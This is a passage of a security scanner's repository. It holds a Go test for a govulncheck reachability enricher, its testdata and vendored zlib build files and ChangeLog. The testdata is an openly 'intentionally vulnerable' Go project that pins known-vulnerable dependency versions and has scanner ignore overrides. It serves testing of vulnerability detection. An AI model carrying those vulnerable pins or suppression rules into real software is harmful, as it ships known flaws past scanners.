dec.Decode(&msg); err != nil { return err } if msg.Finding != nil { to.Finding(msg.Finding) } } return nil } // New returns a new govulncheck source enricher. func New() enricher.Enricher { return &Enricher{} } ================================================ FILE: internal/scalibrenricher/govulncheck/source/govulncheck_test.go ================================================ // Copyright 2025 Google LLC // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package source import ( "path/filepath" "testing" "github.com/google/osv-scalibr/enricher" "github.com/google/osv-scalibr/extractor" "github.com/google/osv-scalibr/extractor/filesystem/language/golang/gomod" scalibrfs "github.com/google/osv-scalibr/fs" "github.com/google/osv-scalibr/inventory" "github.com/google/osv-scalibr/inventory/vex" "github.com/google/osv-scalibr/purl" "github.com/ossf/osv-schema/bindings/go/osvschema" ) const testdata = "./testdata" const reachableVulnID = "GO-2023-1558" const unreachableVulnID = "GO-2021-0053" func TestEnricher(t *testing.T) { t.Parallel() pkgs := setupPackages() vulns := setupPackageVulns() input := enricher.ScanInput{ ScanRoot: &scalibrfs.ScanRoot{ Path: testdata, FS: scalibrfs.DirFS("."), }, } inv := inventory.Inventory{ Packages: pkgs, PackageVulns: vulns, } enr := NewEnricher() err := enr.Enrich(t.Context(), &input, &inv) if err != nil { t.Fatalf("govulncheck enrich failed: %s", err) } for _, vuln := range inv.PackageVulns { switch vuln.Vulnerability.GetId() { case reachableVulnID: if len(vuln.ExploitabilitySignals) != 0 { t.Fatalf("govulncheck enrich failed, expected %s to be reachable, but marked as unreachable", reachableVulnID) } case unreachableVulnID: if len(vuln.ExploitabilitySignals) == 0 || vuln.ExploitabilitySignals[0].Justification != vex.VulnerableCodeNotInExecutePath { t.Fatalf("govulncheck enrich failed, expected %s to be unreachable, but marked as reachable", unreachableVulnID) } } } } func setupPackages() []*extractor.Package { return []*extractor.Package{ { Name: "stdlib", Version: "1.19", PURLType: purl.TypeGolang, Location: extractor.LocationFromPath(filepath.Join(".", "go.mod")), Plugins: []string{gomod.Name}, }, { Name: "github.com/gogo/protobuf", Version: "1.3.1", PURLType: purl.TypeGolang, Location: extractor.LocationFromPath(filepath.Join(".", "go.mod")), Plugins: []string{gomod.Name}, }, { Name: "github.com/ipfs/go-bitfield", Version: "1.0.0", PURLType: purl.TypeGolang, Location: extractor.LocationFromPath(filepath.Join(".", "go.mod")), Plugins: []string{gomod.Name}, }, { Name: "golang.org/x/image", Version: "0.4.0", PURLType: purl.TypeGolang, Location: extractor.LocationFromPath(filepath.Join(".", "go.mod")), Plugins: []string{gomod.Name}, }, } } func setupPackageVulns() []*inventory.PackageVuln { return []*inventory.PackageVuln{ { Vulnerability: &osvschema.Vulnerability{ Id: reachableVulnID, }, }, { Vulnerability: &osvschema.Vulnerability{ Id: unreachableVulnID, }, }, } } ================================================ FILE: internal/scalibrenricher/govulncheck/source/result.go ================================================ // Copied from // https://github.com/golang/vuln/blob/267a472bf377fa105988693c2a597d2b8de36ad8/internal/govulncheck/result.go // and modified. package source // Message is an entry in the output stream. It will always have exactly one // field filled in. type Message struct { Finding *Finding `json:"finding,omitempty"` // The Config, Progress, and OSV fields from the JSON output are removed, since they // are not used. } // Finding represents a single finding. type Finding struct { // OSV is the id of the detected vulnerability. OSV string `json:"osv,omitempty"` // FixedVersion is the module version where the vulnerability was // fixed. This is empty if a fix is not available. // // If there are multiple fixed versions in the OSV report, this will // be the fixed version in the latest range event for the OSV report. // // For example, if the range events are // {introduced: 0, fixed: 1.0.0} and {introduced: 1.1.0}, the fixed version // will be empty. // // For the stdlib, we will show the fixed version closest to the // Go version that is used. For example, if a fix is available in 1.17.5 and // 1.18.5, and the GOVERSION is 1.17.3, 1.17.5 will be returned as the // fixed version. FixedVersion string `json:"fixed_version,omitempty"` // Trace contains an entry for each frame in the trace. // // Frames are sorted starting from the imported vulnerable symbol // until the entry point. The first frame in Frames should match // Symbol. // // In binary mode, trace will contain a single-frame with no position // information. // // When a package is imported but no vulnerable symbol is called, the trace // will contain a single-frame with no symbol or position information. Trace []*Frame `json:"trace,omitempty"` } // Frame represents an entry in a finding trace. type Frame struct { // Module is the module path of the module containing this symbol. // // Importable packages in the standard library will have the path "stdlib". Module string `json:"module"` // Version is the module version from the build graph. Version string `json:"version,omitempty"` // Package is the import path. Package string `json:"package,omitempty"` // Function is the function name. Function string `json:"function,omitempty"` // Receiver is the receiver type if the called symbol is a method. // // The client can create the final symbol name by // prepending Receiver to FuncName. Receiver string `json:"receiver,omitempty"` // Position describes an arbitrary source position // including the file, line, and column location. // A Position is valid if the line number is > 0. Position *Position `json:"position,omitempty"` } // Position is a copy of token.Position used to marshal/unmarshal // JSON correctly. type Position struct { Filename string `json:"filename,omitempty"` // filename, if any Offset int `json:"offset"` // offset, starting at 0 Line int `json:"line"` // line number, starting at 1 Column int `json:"column"` // column number, starting at 1 (byte count) } ================================================ FILE: internal/scalibrenricher/govulncheck/source/testdata/go.mod ================================================ module github.com/ossf-tests/osv-e2e go 1.19 require github.com/gogo/protobuf v1.3.1 require github.com/ipfs/go-bitfield v1.0.0 require golang.org/x/image v0.4.0 // indirect ================================================ FILE: internal/scalibrenricher/govulncheck/source/testdata/go.sum ================================================ github.com/gogo/protobuf v1.3.1 h1:DqDEcV5aeaTmdFBePNpYsp3FlcVH/2ISVVM9Qf8PSls= github.com/gogo/protobuf v1.3.1/go.mod h1:SlYgWuQ5SjCEi6WLHjHCa1yvBfUnHcTbrrZtXPKa29o= github.com/ipfs/go-bitfield v1.0.0 h1:y/XHm2GEmD9wKngheWNNCNL0pzrWXZwCdQGv1ikXknQ= github.com/ipfs/go-bitfield v1.0.0/go.mod h1:N/UiujQy+K+ceU1EF5EkVd1TNqevLrCQMIcAEPrdtus= github.com/kisielk/errcheck v1.2.0/go.mod h1:/BMXB+zMLi60iA8Vv6Ksmxu/1UDYcXs4uQLJ+jE2L00= github.com/kisielk/gotool v1.0.0/go.mod h1:XhKaO+MFFWcvkIS/tQcRk01m1F5IRFswLeQ+oQHNcck= github.com/yuin/goldmark v1.4.13/go.mod h1:6yULJ656Px+3vBD8DxQVa3kxgyrAnzto9xy5taEt/CY= golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w= golang.org/x/crypto v0.0.0-20210921155107-089bfa567519/go.mod h1:GvvjBRRGRdwPK5ydBHafDWAxML/pGHZbMvKqRZ5+Abc= golang.org/x/image v0.4.0 h1:x1RWAiZIvERqkltrFjtQP1ycmiR5pmhjtCfVOtdURuQ= golang.org/x/image v0.4.0/go.mod h1:FVC7BI/5Ym8R25iw5OLsgshdUBbT1h5jZTpA+mvAdZ4= golang.org/x/mod v0.6.0-dev.0.20220419223038-86c51ed26bb4/go.mod h1:jJ57K6gSWd91VN4djpZkiMVwK6gcyfeH4XE8wZrZaV4= golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s= golang.org/x/net v0.0.0-20210226172049-e18ecbb05110/go.mod h1:m0MpNAwzfU5UDzcl9v0D8zg8gWTRqZa9RBIspLL5mdg= golang.org/x/net v0.0.0-20220722155237-a158d28d115b/go.mod h1:XRhObCWvk6IyKnWLug+ECip1KBveYUHfp+8e9klMJ9c= golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20220722155255-886fb9371eb4/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20201119102817-f84b799fce68/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20210615035016-665e8c7367d1/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20220520151302-bc2c85ada10a/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20220722155257-8c9f86f7a55f/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= golang.org/x/term v0.0.0-20210927222741-03fcf44c2211/go.mod h1:jbD1KX2456YbFQfuXm/mYQcufACuNUgVhRMnK/tPxf8= golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/text v0.3.7/go.mod h1:u+2+/6zg+i71rQMx5EYifcz6MCKuco9NR6JIITiCfzQ= golang.org/x/text v0.7.0/go.mod h1:mrYo+phRRbMaCq/xk9113O4dZlRixOauAjOtrjsXDZ8= golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20181030221726-6c7e314b6563/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20191119224855-298f0cb1881e/go.mod h1:b+2E5dAYhXwXZwtnZ6UAqBI28+e2cm9otk0dWdXHAEo= golang.org/x/tools v0.1.12/go.mod h1:hNGJHUnrk76NpqgfD5Aqm5Crs+Hm0VOH/i9J2+nxYbc= golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= ================================================ FILE: internal/scalibrenricher/govulncheck/source/testdata/main.go ================================================ package main import ( "log" "net/http" "github.com/gogo/protobuf/plugin/unmarshal" "github.com/gogo/protobuf/version" "github.com/ipfs/go-bitfield" ) func main() { print(version.AtLeast("v1.2.3")) unmarshal.NewUnmarshal() bitfield.NewBitfield(14) // Test stdlib err := http.ListenAndServe(":8080", nil) if err != nil { log.Fatal(err) } } ================================================ FILE: internal/scalibrenricher/govulncheck/source/testdata/osv-scanner.toml ================================================ [[PackageOverrides]] name = "stdlib" ecosystem = "Go" ignore = true reason = "This is an intentionally vulnerable test project" [[PackageOverrides]] name = "golang.org/x/image" ecosystem = "Go" ignore = true reason = "This is an intentionally vulnerable test project" [[PackageOverrides]] name = "github.com/ipfs/go-bitfield" ecosystem = "Go" ignore = true reason = "This is an intentionally vulnerable test project" [[PackageOverrides]] name = "github.com/gogo/protobuf" ecosystem = "Go" ignore = true reason = "This is an intentionally vulnerable test project" ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/.gitignore ================================================ *.diff *.patch *.orig *.rej *~ *.a *.lo *.o *.dylib *.gcda *.gcno *.gcov /example /example64 /examplesh /libz.so* /minigzip /minigzip64 /minigzipsh /zlib.pc /configure.log .DS_Store ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/CMakeLists.txt ================================================ cmake_minimum_required(VERSION 2.4.4...3.15.0) set(CMAKE_ALLOW_LOOSE_LOOP_CONSTRUCTS ON) project(zlib C) set(VERSION "1.3") set(INSTALL_BIN_DIR "${CMAKE_INSTALL_PREFIX}/bin" CACHE PATH "Installation directory for executables") set(INSTALL_LIB_DIR "${CMAKE_INSTALL_PREFIX}/lib" CACHE PATH "Installation directory for libraries") set(INSTALL_INC_DIR "${CMAKE_INSTALL_PREFIX}/include" CACHE PATH "Installation directory for headers") set(INSTALL_MAN_DIR "${CMAKE_INSTALL_PREFIX}/share/man" CACHE PATH "Installation directory for manual pages") set(INSTALL_PKGCONFIG_DIR "${CMAKE_INSTALL_PREFIX}/share/pkgconfig" CACHE PATH "Installation directory for pkgconfig (.pc) files") include(CheckTypeSize) include(CheckFunctionExists) include(CheckIncludeFile) include(CheckCSourceCompiles) enable_testing() check_include_file(sys/types.h HAVE_SYS_TYPES_H) check_include_file(stdint.h HAVE_STDINT_H) check_include_file(stddef.h HAVE_STDDEF_H) # # Check to see if we have large file support # set(CMAKE_REQUIRED_DEFINITIONS -D_LARGEFILE64_SOURCE=1) # We add these other definitions here because CheckTypeSize.cmake # in CMake 2.4.x does not automatically do so and we want # compatibility with CMake 2.4.x. if(HAVE_SYS_TYPES_H) list(APPEND CMAKE_REQUIRED_DEFINITIONS -DHAVE_SYS_TYPES_H) endif() if(HAVE_STDINT_H) list(APPEND CMAKE_REQUIRED_DEFINITIONS -DHAVE_STDINT_H) endif() if(HAVE_STDDEF_H) list(APPEND CMAKE_REQUIRED_DEFINITIONS -DHAVE_STDDEF_H) endif() check_type_size(off64_t OFF64_T) if(HAVE_OFF64_T) add_definitions(-D_LARGEFILE64_SOURCE=1) endif() set(CMAKE_REQUIRED_DEFINITIONS) # clear variable # # Check for fseeko # check_function_exists(fseeko HAVE_FSEEKO) if(NOT HAVE_FSEEKO) add_definitions(-DNO_FSEEKO) endif() # # Check for unistd.h # check_include_file(unistd.h Z_HAVE_UNISTD_H) if(MSVC) set(CMAKE_DEBUG_POSTFIX "d") add_definitions(-D_CRT_SECURE_NO_DEPRECATE) add_definitions(-D_CRT_NONSTDC_NO_DEPRECATE) include_directories(${CMAKE_CURRENT_SOURCE_DIR}) endif() if(NOT CMAKE_CURRENT_SOURCE_DIR STREQUAL CMAKE_CURRENT_BINARY_DIR) # If we're doing an out of source build and the user has a zconf.h # in their source tree... if(EXISTS ${CMAKE_CURRENT_SOURCE_DIR}/zconf.h) message(STATUS "Renaming") message(STATUS " ${CMAKE_CURRENT_SOURCE_DIR}/zconf.h") message(STATUS "to 'zconf.h.included' because this file is included with zlib") message(STATUS "but CMake generates it automatically in the build directory.") file(RENAME ${CMAKE_CURRENT_SOURCE_DIR}/zconf.h ${CMAKE_CURRENT_SOURCE_DIR}/zconf.h.included) endif() endif() set(ZLIB_PC ${CMAKE_CURRENT_BINARY_DIR}/zlib.pc) configure_file( ${CMAKE_CURRENT_SOURCE_DIR}/zlib.pc.cmakein ${ZLIB_PC} @ONLY) configure_file( ${CMAKE_CURRENT_SOURCE_DIR}/zconf.h.cmakein ${CMAKE_CURRENT_BINARY_DIR}/zconf.h @ONLY) include_directories(${CMAKE_CURRENT_BINARY_DIR} ${CMAKE_SOURCE_DIR}) #============================================================================ # zlib #============================================================================ set(ZLIB_PUBLIC_HDRS ${CMAKE_CURRENT_BINARY_DIR}/zconf.h zlib.h ) set(ZLIB_PRIVATE_HDRS crc32.h deflate.h gzguts.h inffast.h inffixed.h inflate.h inftrees.h trees.h zutil.h ) set(ZLIB_SRCS adler32.c compress.c crc32.c deflate.c gzclose.c gzlib.c gzread.c gzwrite.c inflate.c infback.c inftrees.c inffast.c trees.c uncompr.c zutil.c ) if(NOT MINGW) set(ZLIB_DLL_SRCS win32/zlib1.rc # If present will override custom build rule below. ) endif() # parse the full version number from zlib.h and include in ZLIB_FULL_VERSION file(READ ${CMAKE_CURRENT_SOURCE_DIR}/zlib.h _zlib_h_contents) string(REGEX REPLACE ".*#define[ \t]+ZLIB_VERSION[ \t]+\"([-0-9A-Za-z.]+)\".*" "\\1" ZLIB_FULL_VERSION ${_zlib_h_contents}) if(MINGW) # This gets us DLL resource information when compiling on MinGW. if(NOT CMAKE_RC_COMPILER) set(CMAKE_RC_COMPILER windres.exe) endif() add_custom_command(OUTPUT ${CMAKE_CURRENT_BINARY_DIR}/zlib1rc.obj COMMAND ${CMAKE_RC_COMPILER} -D GCC_WINDRES -I ${CMAKE_CURRENT_SOURCE_DIR} -I ${CMAKE_CURRENT_BINARY_DIR} -o ${CMAKE_CURRENT_BINARY_DIR}/zlib1rc.obj -i ${CMAKE_CURRENT_SOURCE_DIR}/win32/zlib1.rc) set(ZLIB_DLL_SRCS ${CMAKE_CURRENT_BINARY_DIR}/zlib1rc.obj) endif(MINGW) add_library(zlib SHARED ${ZLIB_SRCS} ${ZLIB_DLL_SRCS} ${ZLIB_PUBLIC_HDRS} ${ZLIB_PRIVATE_HDRS}) add_library(zlibstatic STATIC ${ZLIB_SRCS} ${ZLIB_PUBLIC_HDRS} ${ZLIB_PRIVATE_HDRS}) set_target_properties(zlib PROPERTIES DEFINE_SYMBOL ZLIB_DLL) set_target_properties(zlib PROPERTIES SOVERSION 1) if(NOT CYGWIN) # This property causes shared libraries on Linux to have the full version # encoded into their final filename. We disable this on Cygwin because # it causes cygz-${ZLIB_FULL_VERSION}.dll to be created when cygz.dll # seems to be the default. # # This has no effect with MSVC, on that platform the version info for # the DLL comes from the resource file win32/zlib1.rc set_target_properties(zlib PROPERTIES VERSION ${ZLIB_FULL_VERSION}) endif() if(UNIX) # On unix-like platforms the library is almost always called libz set_target_properties(zlib zlibstatic PROPERTIES OUTPUT_NAME z) if(NOT APPLE) set_target_properties(zlib PROPERTIES LINK_FLAGS "-Wl,--version-script,\"${CMAKE_CURRENT_SOURCE_DIR}/zlib.map\"") endif() elseif(BUILD_SHARED_LIBS AND WIN32) # Creates zlib1.dll when building shared library version set_target_properties(zlib PROPERTIES SUFFIX "1.dll") endif() if(NOT SKIP_INSTALL_LIBRARIES AND NOT SKIP_INSTALL_ALL ) install(TARGETS zlib zlibstatic RUNTIME DESTINATION "${INSTALL_BIN_DIR}" ARCHIVE DESTINATION "${INSTALL_LIB_DIR}" LIBRARY DESTINATION "${INSTALL_LIB_DIR}" ) endif() if(NOT SKIP_INSTALL_HEADERS AND NOT SKIP_INSTALL_ALL ) install(FILES ${ZLIB_PUBLIC_HDRS} DESTINATION "${INSTALL_INC_DIR}") endif() if(NOT SKIP_INSTALL_FILES AND NOT SKIP_INSTALL_ALL ) install(FILES zlib.3 DESTINATION "${INSTALL_MAN_DIR}/man3") endif() if(NOT SKIP_INSTALL_FILES AND NOT SKIP_INSTALL_ALL ) install(FILES ${ZLIB_PC} DESTINATION "${INSTALL_PKGCONFIG_DIR}") endif() #============================================================================ # Example binaries #============================================================================ add_executable(example test/example.c) target_link_libraries(example zlib) add_test(example example) add_executable(minigzip test/minigzip.c) target_link_libraries(minigzip zlib) if(HAVE_OFF64_T) add_executable(example64 test/example.c) target_link_libraries(example64 zlib) set_target_properties(example64 PROPERTIES COMPILE_FLAGS "-D_FILE_OFFSET_BITS=64") add_test(example64 example64) add_executable(minigzip64 test/minigzip.c) target_link_libraries(minigzip64 zlib) set_target_properties(minigzip64 PROPERTIES COMPILE_FLAGS "-D_FILE_OFFSET_BITS=64") endif() ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/ChangeLog ================================================ ChangeLog file for zlib Changes in 1.3 (18 Aug 2023) - Remove K&R function definitions and zlib2ansi - Fix bug in deflateBound() for level 0 and memLevel 9 - Fix bug when gzungetc() is used immediately after gzopen() - Fix bug when using gzflush() with a very small buffer - Fix crash when gzsetparams() attempted for transparent write - Fix test/example.c to work with FORCE_STORED - Rewrite of zran in examples (see zran.c version history) - Fix minizip to allow it to open an empty zip file - Fix reading disk number start on zip64 files in minizip - Fix logic error in minizip argument processing - Add minizip testing to Makefile - Read multiple bytes instead of byte-by-byte in minizip unzip.c - Add memory sanitizer to configure (--memory) - Various portability improvements - Various documentation improvements - Various spelling and typo corrections Changes in 1.2.13 (13 Oct 2022) - Fix configure issue that discarded provided CC definition - Correct incorrect inputs provided to the CRC functions - Repair prototypes and exporting of new CRC functions - Fix inflateBack to detect invalid input with distances too far - Have infback() deliver all of the available output up to any error - Fix a bug when getting a gzip header extra field with inflate() - Fix bug in block type selection when Z_FIXED used - Tighten deflateBound bounds - Remove deleted assembler code references - Various portability and appearance improvements Changes in 1.2.12 (27 Mar 2022) - Cygwin does not have _wopen(), so do not create gzopen_w() there - Permit a deflateParams() parameter change as soon as possible - Limit hash table inserts after switch from stored deflate - Fix bug when window full in deflate_stored() - Fix CLEAR_HASH macro to be usable as a single statement - Avoid a conversion error in gzseek when off_t type too small - Have Makefile return non-zero error code on test failure - Avoid some conversion warnings in gzread.c and gzwrite.c - Update use of errno for newer Windows CE versions - Small speedup to inflate [psumbera] - Return an error if the gzputs string length can't fit in an int - Add address checking in clang to -w option of configure - Don't compute check value for raw inflate if asked to validate - Handle case where inflateSync used when header never processed - Avoid the use of ptrdiff_t - Avoid an undefined behavior of memcpy() in gzappend() - Avoid undefined behaviors of memcpy() in gz*printf() - Avoid an undefined behavior of memcpy() in _tr_stored_block() - Make the names in functions declarations identical to definitions - Remove old assembler code in which bugs have manifested - Fix deflateEnd() to not report an error at start of raw deflate - Add legal disclaimer to README - Emphasize the need to continue decompressing gzip members - Correct the initialization requirements for deflateInit2() - Fix a bug that can crash deflate on some input when using Z_FIXED - Assure that the number of bits for deflatePrime() is valid - Use a structure to make globals in enough.c evident - Use a macro for the printf format of big_t in enough.c - Clean up code style in enough.c, update version - Use inline function instead of macro for index in enough.c - Clarify that prefix codes are counted in enough.c - Show all the codes for the maximum tables size in enough.c - Add gznorm.c example, which normalizes gzip files - Fix the zran.c example to work on a multiple-member gzip file - Add tables for crc32_combine(), to speed it up by a factor of 200 - Add crc32_combine_gen() and crc32_combine_op() for fast combines - Speed up software CRC-32 computation by a factor of 1.5 to 3 - Use atomic test and set, if available, for dynamic CRC tables - Don't bother computing check value after successful inflateSync() - Correct comment in crc32.c - Add use of the ARMv8 crc32 instructions when requested - Use ARM crc32 instructions if the ARM architecture has them - Explicitly note that the 32-bit check values are 32 bits - Avoid adding empty gzip member after gzflush with Z_FINISH - Fix memory leak on error in gzlog.c - Fix error in comment on the polynomial representation of a byte - Clarify gz* function interfaces, referring to parameter names - Change macro name in inflate.c to avoid collision in VxWorks - Correct typo in blast.c - Improve portability of contrib/minizip - Fix indentation in minizip's zip.c - Replace black/white with allow/block. (theresa-m) - minizip warning fix if MAXU32 already defined. (gvollant) - Fix unztell64() in minizip to work past 4GB. (Daniël Hörchner) - Clean up minizip to reduce warnings for testing - Add fallthrough comments for gcc - Eliminate use of ULL constants - Separate out address sanitizing from warnings in configure - Remove destructive aspects of make distclean - Check for cc masquerading as gcc or clang in configure - Fix crc32.c to compile local functions only if used Changes in 1.2.11 (15 Jan 2017) - Fix deflate stored bug when pulling last block from window - Permit immediate deflateParams changes before any deflate input Changes in 1.2.10 (2 Jan 2017) - Avoid warnings on snprintf() return value - Fix bug in deflate_stored() for zero-length input - Fix bug in gzwrite.c that produced corrupt gzip files - Remove files to be installed before copying them in Makefile.in - Add warnings when compiling with assembler code Changes in 1.2.9 (31 Dec 2016) - Fix contrib/minizip to permit unzipping with desktop API [Zouzou] - Improve contrib/blast to return unused bytes - Assure that gzoffset() is correct when appending - Improve compress() and uncompress() to support large lengths - Fix bug in test/example.c where error code not saved - Remedy Coverity warning [Randers-Pehrson] - Improve speed of gzprintf() in transparent mode - Fix inflateInit2() bug when windowBits is 16 or 32 - Change DEBUG macro to ZLIB_DEBUG - Avoid uninitialized access by gzclose_w() - Allow building zlib outside of the source directory - Fix bug that accepted invalid zlib header when windowBits is zero - Fix gzseek() problem on MinGW due to buggy _lseeki64 there - Loop on write() calls in gzwrite.c in case of non-blocking I/O - Add --warn (-w) option to ./configure for more compiler warnings - Reject a window size of 256 bytes if not using the zlib wrapper - Fix bug when level 0 used with Z_HUFFMAN or Z_RLE - Add --debug (-d) option to ./configure to define ZLIB_DEBUG - Fix bugs in creating a very large gzip header - Add uncompress2() function, which returns the input size used - Assure that deflateParams() will not switch functions mid-block - Dramatically speed up deflation for level 0 (storing) - Add gzfread(), duplicating the interface of fread() - Add gzfwrite(), duplicating the interface of fwrite() - Add deflateGetDictionary() function - Use snprintf() for later versions of Microsoft C - Fix *Init macros to use z_ prefix when requested - Replace as400 with os400 for OS/400 support [Monnerat] - Add crc32_z() and adler32_z() functions with size_t lengths - Update Visual Studio project files [AraHaan] Changes in 1.2.8 (28 Apr 2013) - Update contrib/minizip/iowin32.c for Windows RT [Vollant] - Do not force Z_CONST for C++ - Clean up contrib/vstudio [Roß] - Correct spelling error in zlib.h - Fix mixed line endings in contrib/vstudio Changes in 1.2.7.3 (13 Apr 2013) - Fix version numbers and DLL names in contrib/vstudio/*/zlib.rc Changes in 1.2.7.2 (13 Apr 2013) - Change check for a four-byte type back to hexadecimal - Fix typo in win32/Makefile.msc - Add casts in gzwrite.c for pointer differences Changes in 1.2.7.1 (24 Mar 2013) - Replace use of unsafe string functions with snprintf if available - Avoid including stddef.h on Windows for Z_SOLO compile [Niessink] - Fix gzgetc undefine when Z_PREFIX set [Turk] - Eliminate use of mktemp in Makefile (not always available) - Fix bug in 'F' mode for gzopen() - Add inflateGetDictionary() function - Correct comment in deflate.h - Use _snprintf for snprintf in Microsoft C - On Darwin, only use /usr/bin/libtool if libtool is not Apple - Delete "--version" file if created by "ar --version" [Richard G.] - Fix configure check for veracity of compiler error return codes - Fix CMake compilation of static lib for MSVC2010 x64 - Remove unused variable in infback9.c - Fix argument checks in gzlog_compress() and gzlog_write() - Clean up the usage of z_const and respect const usage within zlib - Clean up examples/gzlog.[ch] comparisons of different types - Avoid shift equal to bits in type (caused endless loop) - Fix uninitialized value bug in gzputc() introduced by const patches - Fix memory allocation error in examples/zran.c [Nor] - Fix bug where gzopen(), gzclose() would write an empty file - Fix bug in gzclose() when gzwrite() runs out of memory - Check for input buffer malloc failure in examples/gzappend.c - Add note to contrib/blast to use binary mode in stdio - Fix comparisons of differently signed integers in contrib/blast - Check for invalid code length codes in contrib/puff - Fix serious but very rare decompression bug in inftrees.c - Update inflateBack() comments, since inflate() can be faster - Use underscored I/O function names for WINAPI_FAMILY - Add _tr_flush_bits to the external symbols prefixed by --zprefix - Add contrib/vstudio/vc10 pre-build step for static only - Quote --version-script argument in CMakeLists.txt - Don't specify --version-script on Apple platforms in CMakeLists.txt - Fix casting error in contrib/testzlib/testzlib.c - Fix types in contrib/minizip to match result of get_crc_table() - Simplify contrib/vstudio/vc10 with 'd' suffix - Add TOP support to win32/Makefile.msc - Support i686 and amd64 assembler builds in CMakeLists.txt - Fix typos in the use of _LARGEFILE64_SOURCE in zconf.h - Add vc11 and vc12 build files to contrib/vstudio - Add gzvprintf() as an undocumented function in zlib - Fix configure for Sun shell - Remove runtime check in configure for four-byte integer type - Add casts and consts to ease user conversion to C++ - Add man pages for minizip and miniunzip - In Makefile uninstall, don't rm if preceding cd fails - Do not return Z_BUF_ERROR if deflateParam() has nothing to write Changes in 1.2.7 (2 May 2012) - Replace use of memmove() with a simple copy for portability - Test for existence of strerror - Restore gzgetc_ for backward compatibility with 1.2.6 - Fix build with non-GNU make on Solaris - Require gcc 4.0 or later on Mac OS X to use the hidden attribute - Include unistd.h for Watcom C - Use __WATCOMC__ instead of __WATCOM__ - Do not use the visibility attribute if NO_VIZ defined - Improve the detection of no hidden visibility attribute - Avoid using __int64 for gcc or solo compilation - Cast to char * in gzprintf to avoid warnings [Zinser] - Fix make_vms.com for VAX [Zinser] - Don't use library or built-in byte swaps - Simplify test and use of gcc hidden attribute - Fix bug in gzclose_w() when gzwrite() fails to allocate memory - Add "x" (O_EXCL) and "e" (O_CLOEXEC) modes support to gzopen() - Fix bug in test/minigzip.c for configure --solo - Fix contrib/vstudio project link errors [Mohanathas] - Add ability to choose the builder in make_vms.com [Schweda] - Add DESTDIR support to mingw32 win32/Makefile.gcc - Fix comments in win32/Makefile.gcc for proper usage - Allow overriding the default install locations for cmake - Generate and install the pkg-config file with cmake - Build both a static and a shared version of zlib with cmake - Include version symbols for cmake builds - If using cmake with MSVC, add the source directory to the includes - Remove unneeded EXTRA_CFLAGS from win32/Makefile.gcc [Truta] - Move obsolete emx makefile to old [Truta] - Allow the use of -Wundef when compiling or using zlib - Avoid the use of the -u option with mktemp - Improve inflate() documentation on the use of Z_FINISH - Recognize clang as gcc - Add gzopen_w() in Windows for wide character path names - Rename zconf.h in CMakeLists.txt to move it out of the way - Add source directory in CMakeLists.txt for building examples - Look in build directory for zlib.pc in CMakeLists.txt - Remove gzflags from zlibvc.def in vc9 and vc10 - Fix contrib/minizip compilation in the MinGW environment - Update ./configure for Solaris, support --64 [Mooney] - Remove -R. from Solaris shared build (possible security issue) - Avoid race condition for parallel make (-j) running example - Fix type mismatch between get_crc_table() and crc_table - Fix parsing of version with "-" in CMakeLists.txt [Snider, Ziegler] - Fix the path to zlib.map in CMakeLists.txt - Force the native libtool in Mac OS X to avoid GNU libtool [Beebe] - Add instructions to win32/Makefile.gcc for shared install [Torri] Changes in 1.2.6.1 (12 Feb 2012) - Avoid the use of the Objective-C reserved name "id" - Include io.h in gzguts.h for Microsoft compilers - Fix problem with ./configure --prefix and gzgetc macro - Include gz_header definition when compiling zlib solo - Put gzflags() functionality back in zutil.c - Avoid library header include in crc32.c for Z_SOLO - Use name in GCC_CLASSIC as C compiler for coverage testing, if set - Minor cleanup in contrib/minizip/zip.c [Vollant] - Update make_vms.com [Zinser] - Remove unnecessary gzgetc_ function - Use optimized byte swap operations for Microsoft and GNU [Snyder] - Fix minor typo in zlib.h comments [Rzesniowiecki] Changes in 1.2.6 (29 Jan 2012) - Update the Pascal interface in contrib/pascal - Fix function numbers for gzgetc_ in zlibvc.def files - Fix configure.ac for contrib/minizip [Schiffer] - 